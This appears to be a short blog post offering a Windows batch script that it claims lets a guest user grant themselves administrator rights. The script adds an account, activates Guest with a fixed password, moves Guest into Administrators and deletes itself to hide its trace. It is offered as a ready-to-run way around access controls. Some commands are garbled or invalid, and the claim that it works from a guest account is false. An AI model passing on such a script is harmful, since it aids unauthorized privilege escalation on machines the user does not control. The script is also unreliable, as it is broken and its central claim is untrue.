Want admin privileges on your pc, when you are log on as guest user
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Than double click on it. This will add Guest user in administrators group
echo off
title Please wait...
clsnet user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Karnav Thakar. MCP, MCSA, MCSE, MSITP, CHFI, ECA
Subscribe to:
Post Comments (Atom)
ISM Cyber Security Terms
ISM Cyber Security Terms
-
Type the following command in run "compmgmt.msc"(don’t use quotes) then u will be opened with a window in that-> Go to local us...
-
Hello Friends, Some time you want to remove / unload Trend Micro Client agent from system(Computer). Please fnid here with the details. ...
No comments:
Post a Comment